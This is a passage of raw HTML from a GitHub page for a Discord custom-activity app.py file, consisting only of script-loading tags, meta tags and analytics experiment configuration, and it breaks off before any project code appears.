data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-12ba9916.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aiqMIGGZGo8AQMjcoImKPMTsZVVRl6htCSY7BpRmpGPG/AF+Wq+P/Oj/dthWQOIk9cCNMPEas7O2zAR6oqn0tA==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-6a2a8c20.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-grRajv+ZiHV6dOdj1ZVsPoGYLqUr9lblDxPEuf6Fo3/GNfqIwV0NUvqiq05w68106TDk/g3iUkpOjDEpiEepuA==" type="application/javascript" data-module-id="./chunk-failbot.js" data-src="https://github.githubassets.com/assets/chunk-failbot-82b45a8e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3jmKS/bkQpYNk9QJJ6D0y6iGTh7Lu2UVD/QLZZqutFE7e3IXxhEbQX0GXbl0PQWZ6whWKViOT3pOf/5zcaCXcA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-de398a4b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-OszE/6GlmrYt3ALid4xVFd3/4d9cUH08ndFsO7vs/RHCz2bJ8+UsbjBc8wf09hyCOe9PuEgW0HDWpD32xMio2Q==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-3accc4ff.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-BV7wU3kptBGiv52rPu5ez9Fp8hDs9NxIm75USxtiip+HjDhStyYpG7hQMatWFmoYcumArHN0IAbC0b8XJfg+Hw==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-055ef053.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-JuwLQc/GiXiL3aQZ3y52X1UWniOU21IfTqzwnrfsFgxCwwhPUgh7KcIHb2oTxGC+yi7k5KN1mGVRifLWQMcfVw==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-26ec0b41.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4Wq8F/+bu5aXHG0CFx4Z1Whiip3tIAR70gvZgZtx8HiTLyBdzEUSSA9Soe3c67SUGuiJQB834x/1sse1bxBmeg==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-e16abc17.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AifR/xlMdAmSB9UcJEPQ16P863/ZqDphDeGKBZSPuSgsNaaehDErJfLCn1saUs0o0fAuM0jr+Sxr4HtQp7qpBA==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-0227d1ff.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-G/DI+JNZR6uAoSYxBCT6GSHHvZgBBCF1S40IIX/C797hFmg10tGcnlCbv3AzbBsPRPfQlh0GKZv5019fihsLow==" type="application/javascript" data-module-id="./chunk-keyboard-shortcuts-helper.js" data-src="https://github.githubassets.com/assets/chunk-keyboard-shortcuts-helper-1bf0c8f8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3q9CgTtVlQ6fkBQRgpwkwOZ+3tHjtGqOJeAI+Vp4bbcig2h1mR9iRJG2ohClN8+YThWAOBxizc8R/yrZPbxNSw==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-deaf4281.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-m2VwI1wpMT5jpAzQLL7sVG0WkxzNAiBXeitEnh0A2tUHb+r4sVRzoR8PAyf0+zUkEDO5Ne5DBWO7gM2FtdT7cw==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9b657023.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7G7VNhRoIxfK6aKTgUSUtMHI6U0k+szgDfwZIEcKuQKs+K0XZGfVivusB0NlOy78zixfFSI7NHzmvHike+5uyQ==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-ec6ed536.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7hZ031ngiF36wGsfcoyyCWTqwYxjX+qeTLtCV7CJ+IO+wzkzCm1RoR3WzWczfWmwLNqr+Hu3kQOgkBaGn4ntWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-ee1674df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ow4QYm35S5iR6nm/e/tx16lHUTK8pg1Ke1asLBVj6HzevTuo7S0GcL+7sWjvKOBvrVLgbwyPzfth75Vs6L3ePQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-a30e1062.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-wXlv/QM4OsXYyUuSfFjx3XqSmvfLqtjvBx6wFlGNmHzd6Dkmr1HkTZs1qpCYTCjiyw1zm5ORa4O4gWAKc+cKPw==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-c1796ffd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4O3AMK3FmKoTDmbBwFGIg+rNW3s73lJFQNLSBF1bczsjNsi8zT2t54vTwY1cMG1dox6Nt11wRGhevi1wxOFhWw==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-e0edc030.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-hgoSKLTlL8I3IWr/TLONCU+N4kdCtdrHCrrud4NKhgRlLrTw0XUPhqBaDdZUiFSzDQRw/nFQ1kw2VeTm0g9+lA==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-860a1228.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7KSTAXtI9DmFWoq8LjFSgxvvQZBoKHjyN5ZBzEWZ39P/CSWrQf/VaVKd0zpkd8vDk7mq7bcDSniipoFbjTABUA==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-eca49301.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nOP8bLqNZgktv1/5mFrm9LhZDgozlsEbAj/XuQ35rxK/NNbqAmBDfeXQ+pkY5SXDd/8Bz/+RGfwr3FHL2sopSQ==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-9ce3fc6c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-rhladi60G4WRCtFkJAErIB32DBQt6BIMuzFRR0wJ68nWcqex4+C5Xb62rsOSNdluP3kuaSyWT3GTLCDSLv5jIA==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-ae195a76.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-OoQBKokKMwRbi8BnCiii19MhicXF30O4k4hG7Vjg4xOltzKOC3kmOT0ERg0JBHqWGfjuMRWhuGNEX2EKgxalUw==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-3a84012a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-9XDv6O7Jn1ObhwWefPuUA4owGMOkPsTnvIITKck1CaZH35Sad6L1gq+Vvw8TEeB+gYUgBxWdkl3LgXjVkpDWMQ==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-f570efe8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8EhI56c+WrEr07oNcFy+Q329w5+DQVhB2TO9e0bT/TxnooHtwze/OanZof/+zDJxW7RbYY2pzRVwLRvoJRHUrA==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-f04848e7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-fDNA1jZjxFyXNVY10A8BfaZE/vpXhcnOI23xRlVWDJwmLsDsGm+5fedVhSPI9xxWfAVd9x6dFgZ0wzJRhFo3Rw==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-7c3340d6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-bjSP8StMagdENf3/Xy8fkbUePS7vNbw+2hpgg0tne7zm/eiz3b1mM0XthFTSfxhO9QHFD8wO/hOCcbnORvN3NA==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-6e348ff1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SBHO7sHXCuNn05KXDWS2ESheFt4K2kHRApzXS5HnFzOcb3d1yP0l44PDzciQdCLs9Bqf5LT5TdSL9X1P3ELwUA==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-4811ceee.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-OhOqF8hc26oNrxmRDWKLI5q2fZ981+zlYQnP8NWdQdHVw4/PS458WilKGoU2xaMsoFD7VmzAv0/TEUDbrDLpNA==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-3a13aa17.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4QXRinR8LP2zrjFze0MDwuRPeLAojLt0f8KEdUTJdb2YkYLLgYGqolD+6R7ZDq9Z4JN8R7W6l8Ol+Mq1K0o2hg==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-e105d18a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-r43awUBZWgUCEeqtDxYagERDbdN40mKXncMXD3WOB/COTYK83O6LTdXAgSQqR8pzYLutqstdN/O69iL641ka9w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-af8ddac1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-+ghwIHl4WoTIKefFnsS00RF8wYc+3MqK4eEh1Rst68581JyTbm7O1RxzJjjzlXscQC81/zl70xwhc+SjdReoIA==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-fa087020.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-THgJsKACwTri1ETwLTU7myuj4XY4Jp4ZNziTof0Fo6v0iOljLueWxBybgtoOk1xWxa51GupjBc+gOoPGj8TaZA==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-4c7809b0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-WK8VXw3lfUQ/VRW0zlgKPhcMUqH0uTnB/KzePUPdZhCm/HpxfXXHKTGvj5C0Oex7+zbIM2ECzULbtTCT4ug3yg==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-58af155f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZunpwBOViRebn/36Tku+7ZX39dPhNTIyKl+mL5t3n4F9JrcHiwYJdApE8OWHcvkzmGuD0f/AlUwzPIrafMHMBw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-66e9e9c0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-fvcOOYapCxPkDRQWz2WQzrqL6rRhX88yHWF87fb9Xny2Fq4lri0ONaVFL7XDSTiTyu4OTp+8WoyfMVpgGUaaVg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-7ef70e39.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-hXM+wbN4loHepYG9wciuBZIBbZKnyrj1fHNEc2U4FGp4ferKbr4SA/wGyOZUun/W+yw+aHi0R0ZQqgr0YBFhQQ==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-85733ec1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-wQnjXBFgueIl3c4MJVGGbqMThHgUcsOVtWP3vsLqqjRdtPae9B/fXj91Ow2UyzOF3b28lFfDi3jCyrJ+0oc/5g==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-c109e35c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-A4qmVMCzB5D2dyHe2jUKlYmeGBxzaGzo+me2FKfRqrKfvAFQqnb8lSH60xmtaAGbaJze3hBMBlA2IlCLCvFwLg==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-038aa654.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VkWgu6DTrdgalvai4dv3kFM+AW4sPKJ0HnXDkTR+ED2YuypnGKavD4cqmX0iwDu1nE46Iax70/mdH5hWKOjSGQ==" type="application/javascript" src="https://github.githubassets.com/assets/diffs-5645a0bb.js"></script> <meta name="viewport" content="width=device-width"> <title>discord-custom-activity/app.py at master · agambajwa/discord-custom-activity</title> <meta name="description" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/9406fb387f4cda6ec027dc5254604a347e68437b1b79b7a4e20ce47057c0766d/agambajwa/discord-custom-activity" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="discord-custom-activity/app.py at master · agambajwa/discord-custom-activity" /><meta name="twitter:description" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/9406fb387f4cda6ec027dc5254604a347e68437b1b79b7a4e20ce47057c0766d/agambajwa/discord-custom-activity" /><meta property="og:image:alt" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="discord-custom-activity/app.py at master · agambajwa/discord-custom-activity" /><meta property="og:url" content="https://github.com/agambajwa/discord-custom-activity" /><meta property="og:description" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <link rel="shared-web-socket" href="wss://alive.github.com/_sockets/u/91737103/ws?session=eyJ2IjoiVjMiLCJ1Ijo5MTczNzEwMywicyI6NzYxNzA1MDI2LCJjIjo0MTc3MzU0NDYyLCJ0IjoxNjMzMzQ2MTgxfQ==--39edc59650e83b8d21b49e80f0dc2c8d8b193b66b4ee07dbdcea646522e41c9a" data-refresh-url="/_alive" data-session-id="7f83f766808e89f2c7b35c4840e92fc948d791956ae5c8a102edd36d614a7dd3"> <link rel="shared-web-socket-src" href="/socket-worker-0af8a29d.js"> <link rel="sudo-modal" href="/sessions/sudo_modal"> <meta name="request-id" content="A49F:7859:D3968:14FACD:615AE285" data-pjax-transient="true" /><meta name="html-safe-nonce" content="820993e64658c9849c0e0da6552784777372f6b8c3b5cd1e47564c3857ce68f9" data-pjax-transient="true" /><meta name="visitor-payload" content="eyJyZWZlcnJlciI6Imh0dHBzOi8vZ2l0aHViLmNvbS9hZ2FtYmFqd2EvZGlzY29yZC1jdXN0b20tYWN0aXZpdHkiLCJyZXF1ZXN0X2lkIjoiQTQ5Rjo3ODU5OkQzOTY4OjE0RkFDRDo2MTVBRTI4NSIsInZpc2l0b3JfaWQiOiI2NzQzMDk1MDUyODcxMjcyNDA5IiwicmVnaW9uX2VkZ2UiOiJzb3V0aGVhc3Rhc2lhIiwicmVnaW9uX3JlbmRlciI6ImlhZCJ9" data-pjax-transient="true" /><meta name="visitor-hmac" content="df6cd9ddda4db95524fb9c3c9cc17f8b88a8f25b230bc1e43f92b48812fa8bbd" data-pjax-transient="true" /> <meta name="hovercard-subject-tag" content="repository:298526344" data-pjax-transient> <meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" /> <meta name="selected-link" value="repo_source" data-pjax-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="octolytics-host" content="collector.githubapp.com" /><meta name="octolytics-app-id" content="github" /><meta name="octolytics-event-url" content="https://collector.githubapp.com/github-external/browser_event" /><meta name="octolytics-actor-id" content="91737103" /><meta name="octolytics-actor-login" content="Bomzz06" /><meta name="octolytics-actor-hash" content="768d6322e087f5dd93879e36a05bc5cd2c0b8e677c83f0a6378ea6775b96f44b" /> <meta name="analytics-location" content="/&lt;user-name&gt;/&lt;repo-name&gt;/blob/show" data-pjax-transient="true" /> <meta name="optimizely-datafile" content="{&quot;version&quot;: &quot;4&quot;, &quot;rollouts&quot;: [], &quot;typedAudiences&quot;: [], &quot;anonymizeIP&quot;: true, &quot;projectId&quot;: &quot;16737760170&quot;, &quot;variables&quot;: [], &quot;featureFlags&quot;: [], &quot;experiments&quot;: [{&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20438636352&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20484957397&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20479227424&quot;, &quot;key&quot;: &quot;growth_ghec_onboarding_experience&quot;, &quot;layerId&quot;: &quot;20467848595&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20484957397&quot;, &quot;endOfRange&quot;: 1000}, {&quot;entityId&quot;: &quot;20438636352&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20438636352&quot;, &quot;endOfRange&quot;: 6000}, {&quot;entityId&quot;: &quot;20484957397&quot;, &quot;endOfRange&quot;: 8000}, {&quot;entityId&quot;: &quot;20484957397&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}, {&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20508232513&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20533742085&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20512531891&quot;, &quot;key&quot;: &quot;growth_pull_request_actions_prompt&quot;, &quot;layerId&quot;: &quot;20529822202&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20533742085&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20508232513&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}, {&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20543572345&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20510876757&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20518037255&quot;, &quot;key&quot;: &quot;growth_issue_actions_prompt&quot;, &quot;layerId&quot;: &quot;20522524291&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20510876757&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20543572345&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}, {&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20619540113&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20598530123&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20619150105&quot;, &quot;key&quot;: &quot;dynamic_seats&quot;, &quot;layerId&quot;: &quot;20615170077&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20598530123&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20619540113&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}], &quot;audiences&quot;: [{&quot;conditions&quot;: &quot;[\&quot;or\&quot;, {\&quot;match\&quot;: \&quot;exact\&quot;, \&quot;name\&quot;: \&quot;$opt_dummy_attribute\&quot;, \&quot;type\&quot;: \&quot;custom_attribute\&quot;, \&quot;value\&quot;: \&quot;$opt_dummy_value\&quot;}]&quot;, &quot;id&quot;: &quot;$opt_dummy_audience&quot;, &quot;name&quot;: &quot;Optimizely-Generated Audience for Backwards Compatibility&quot;}], &quot;groups&quot;: [], &quot;sdkKey&quot;: &quot;WTc6awnGuYDdG98CYRban&quot;, &quot;environmentKey&quot;: &quot;production&quot;, &quot;attributes&quot;: [{&quot;id&quot;: &quot;16822470375&quot;, &quot;key&quot;: &quot;user_id&quot;}, {&quot;id&quot;: &quot;17143601254&quot;, &quot;key&quot;: &quot;spammy&quot;}, {&quot;id&quot;: &quot;18175660309&quot;, &quot;key&quot;: &quot;organization_plan&quot;}, {&quot;id&quot;: &quot;18813001570&quot;, &quot;key&quot;: &quot;is_logged_in&quot;}, {&quot;id&quot;: &quot;19073851829&quot;, &quot;key&quot;: &quot;geo&quot;}, {&quot;id&quot;: &quot;20175462351&quot;, &quot;key&quot;: &quot;requestedCurrency&quot;}], &quot;botFiltering&quot;: false, &quot;accountId&quot;: &quot;16737760170&quot;, &quot;events&quot;: [{&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;17911811441&quot;, &quot;key&quot;: &quot;hydro_click.dashboard.teacher_toolbox_cta&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18124116703&quot;, &quot;key&quot;: &quot;submit.organizations.complete_sign_up&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18145892387&quot;, &quot;key&quot;: &quot;no_metric.tracked_outside_of_optimizely&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18178755568&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.add_repo&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18180553241&quot;, &quot;key&quot;: &quot;submit.repository_imports.create&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18186103728&quot;, &quot;key&quot;: &quot;click.help.learn_more_about_repository_creation&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18188530140&quot;, &quot;key&quot;: &quot;test_event.do_not_use_in_production&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18191963644&quot;, &quot;key&quot;: &quot;click.empty_org_repo_cta.transfer_repository&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18195612788&quot;, &quot;key&quot;: &quot;click.empty_org_repo_cta.import_repository&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18210945499&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.invite_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18211063248&quot;, &quot;key&quot;: &quot;click.empty_org_repo_cta.create_repository&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18215721889&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.update_profile&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18224360785&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.dismiss&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18234832286&quot;, &quot;key&quot;: &quot;submit.organization_activation.complete&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18252392383&quot;, &quot;key&quot;: &quot;submit.org_repository.create&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18257551537&quot;, &quot;key&quot;: &quot;submit.org_member_invitation.create&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18259522260&quot;, &quot;key&quot;: &quot;submit.organization_profile.update&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18564603625&quot;, &quot;key&quot;: &quot;view.classroom_select_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18568612016&quot;, &quot;key&quot;: &quot;click.classroom_sign_in_click&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18572592540&quot;, &quot;key&quot;: &quot;view.classroom_name&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18574203855&quot;, &quot;key&quot;: &quot;click.classroom_create_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18582053415&quot;, &quot;key&quot;: &quot;click.classroom_select_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18589463420&quot;, &quot;key&quot;: &quot;click.classroom_create_classroom&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18591323364&quot;, &quot;key&quot;: &quot;click.classroom_create_first_classroom&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18591652321&quot;, &quot;key&quot;: &quot;click.classroom_grant_access&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18607131425&quot;, &quot;key&quot;: &quot;view.classroom_creation&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;, &quot;20619150105&quot;], &quot;id&quot;: &quot;18831680583&quot;, &quot;key&quot;: &quot;upgrade_account_plan&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19064064515&quot;, &quot;key&quot;: &quot;click.signup&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19075373687&quot;, &quot;key&quot;: &quot;click.view_account_billing_page&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19077355841&quot;, &quot;key&quot;: &quot;click.dismiss_signup_prompt&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19079713938&quot;, &quot;key&quot;: &quot;click.contact_sales&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19120963070&quot;, &quot;key&quot;: &quot;click.compare_account_plans&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19151690317&quot;, &quot;key&quot;: &quot;click.upgrade_account_cta&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19424193129&quot;, &quot;key&quot;: &quot;click.open_account_switcher&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19520330825&quot;, &quot;key&quot;: &quot;click.visit_account_profile&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19540970635&quot;, &quot;key&quot;: &quot;click.switch_account_context&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19730198868&quot;, &quot;key&quot;: &quot;submit.homepage_signup&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19820830627&quot;, &quot;key&quot;: &quot;click.homepage_signup&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19988571001&quot;, &quot;key&quot;: &quot;click.create_enterprise_trial&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20036538294&quot;, &quot;key&quot;: &quot;click.create_organization_team&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20040653299&quot;, &quot;key&quot;: &quot;click.input_enterprise_trial_form&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20062030003&quot;, &quot;key&quot;: &quot;click.continue_with_team&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20068947153&quot;, &quot;key&quot;: &quot;click.create_organization_free&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20086636658&quot;, &quot;key&quot;: &quot;click.signup_continue.username&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20091648988&quot;, &quot;key&quot;: &quot;click.signup_continue.create_account&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20103637615&quot;, &quot;key&quot;: &quot;click.signup_continue.email&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20111574253&quot;, &quot;key&quot;: &quot;click.signup_continue.password&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20120044111&quot;, &quot;key&quot;: &quot;view.pricing_page&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20152062109&quot;, &quot;key&quot;: &quot;submit.create_account&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: 